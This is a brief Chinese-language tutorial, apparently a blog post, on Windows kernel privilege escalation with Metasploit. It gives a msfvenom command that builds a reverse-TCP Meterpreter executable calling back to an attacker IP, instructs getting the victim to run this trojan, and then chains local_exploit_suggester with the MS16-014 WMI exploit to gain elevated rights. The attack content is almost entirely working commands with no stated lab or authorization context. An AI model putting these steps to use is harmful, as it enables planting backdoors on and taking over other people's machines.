msf溢出提权

此提权⽅法是利⽤系统本身存在的⼀些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对⽐ systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以 提权提升的exp。 注意系统跟版本号要一致

 

ip a

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.66 LPOR
=7777 -f exe -o win7.exe

msfconsole 
 use exploit/multi/handler

show options 

把需要该配置配置了 主机 payload 端口

run

getuid
bg
sessions  查看所有后台

注意生成木马上装到受害机器上并执行它

use post/multi/recon/local_exploit_suggester

set session 1

use post/multi/recon/local_exploit_suggester

set session 1
run

yes是可能存在的 no是不存在

use exploit/windows/local/ms16_014_wmi_recv_notif

看系统对着不,不对就重新找找 对就下一步

show options

set session 
run
getuid  查看权限   成功提权

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值